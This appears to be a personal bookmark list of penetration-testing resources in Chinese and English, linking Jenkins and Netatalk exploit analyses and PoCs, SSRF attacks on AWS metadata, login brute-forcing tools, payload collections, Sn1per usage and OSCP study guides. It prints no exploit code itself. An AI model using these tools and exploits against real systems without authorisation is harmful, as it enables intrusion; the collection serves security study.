[The Hacker Playbook 3: Practical Guide To Penetration Testing.pdf](https://drive.google.com/file/d/1RqzIzvRg0nW-RmqKwdOIdcLUv_hSqg6P/view) [Pocsuite3 是知道创宇404实验室打造的一款开源的远程漏洞测试框架](https://github.com/knownsec/Pocsuite) [Automating Jenkins Hacking using Shodan API](https://github.com/joesmithjaffa/jenkins-shell) [Jenkins 未授权代码执行漏洞分析](https://www.anquanke.com/post/id/86018) https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353 [Jenkins 任意文件读取漏洞复现与分析 - 【CVE-2018-1999002】](https://xz.aliyun.com/t/2486) [Jenkins漏洞分析 CVE-2018-1999001](https://xz.aliyun.com/t/3652#toc-0) [getting an MD5 collision of these 2 images is now(*) trivialhttps://github.com/corkami/pocs/blob/master/collisions/scripts/png.py and instant.](https://github.com/corkami/pocs/tree/master/collisions) PowerShell命令校验文件的Hash值 ``` Get-FileHash 文件路径 -Algorithm 校验的Hash值类型| Format-List ``` [用python调用chrome模拟浏览器爆破登录密码](https://github.com/MetaChar/Hatch) [PE文件全解析](http://www.4hou.com/system/7782.html) [PE可执行文件格式详解](https://zhuanlan.zhihu.com/p/31967907) [PE文件学习笔记(六):总结与PE解析器(PETool)实现](https://blog.csdn.net/apollon_krj/article/details/77427729) ​ ## 28 [看我如何利用NodeJS SSRF漏洞获得AWS完全控制权限](https://www.anquanke.com/post/id/161455) http://www.4hou.com/vulnerable/15088.html [利用SSRF漏洞滥用AWS元数据服务](http://www.4hou.com/vulnerable/5767.html) ## 29 [python开发时几种安全验证的实现](https://segmentfault.com/a/1190000011914950) [python发送短信验证码](https://juejin.im/post/5b3243e66fb9a00e8a3e62eb) [圣诞前夕X-MAS CTF一道有趣的web+pwn](https://www.anquanke.com/post/id/168705) [**Automating AD Enumeration**](https://medium.com/bugbountywriteup/automating-ad-enumeration-with-frameworks-f8c7449563be) 一些渗透神器 https://blog.cobaltstrike.com/ [XSS in hidden input fields](https://portswigger.net/blog/xss-in-hidden-input-fields) https://twitter.com/garethheyes/status/1062643854501928965 [PoC for Foxit Reader CVE-2018-14442](https://github.com/payatu/CVE-2018-14442) [Using IronPython to monitor specified process and create a popup to verify user credentials.](https://www.youtube.com/watch?time_continue=28&v=E6XiQIZ6Km0) ## 30 \[tools][Multiple Weaknesses Checking for Mass Subdomains](https://github.com/Leoid/B1tMass) [CVE-2018-1160: Netatalk - Bypass Authentication](https://medium.com/tenable-techblog/exploiting-an-18-year-old-bug-b47afe54172) http://www.4hou.com/vulnerable/15376.html https://github.com/tenable/poc/tree/master/netatalk/cve_2018_1160 > Netatalk是苹果归档协议(Apple Filing Protocol,AFP)的一种实现。该项目自身非常古老,在Sourceforge的第一次导入最早可以追溯到2000年,但该项目的实际年龄比这还要更长。 > > github的poc可以实现目录扫描和文件读取 [CVE-2018-42**](https://github.com/W00dL3cs/exploit_playground/tree/master/CVE-2018-42**) [一个 9.57 KB 的巨型文件和 Linux 为什么会有/usr](http://jandan.net/2018/11/08/bug-feature.html) ## 31 \[tools] [Sn1per Automated pentest framework for offensive security experts](https://github.com/1N3/Sn1per) https://www.freebuf.com/sectool/191767.html [Docker安装](https://hub.docker.com/r/menzo/sn1per-docker/dockerfile): ``` https://github.com/menzow/sn1per-docker ``` Docker构建: ``` https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/ ``` 使用样例 ``` $docker pull menzo/sn1per-docker $docker run --rm -ti menzo/sn1per-docker sniper menzo.io ``` [Git All the Payloads! A collection of web attack payloads.](https://github.com/foospidy/payloads) \[tools] [A guide for amateurs pen testers and a collection of hacking tools, resources and references to practice ethical hacking, pen testing and web security.](https://github.com/sundowndev/hacker-roadmap) [OSCP认证经验](https://xz.aliyun.com/t/1587#toc-0) [OSCP RoadMap](https://github.com/nairuzabulhul/RoadMap)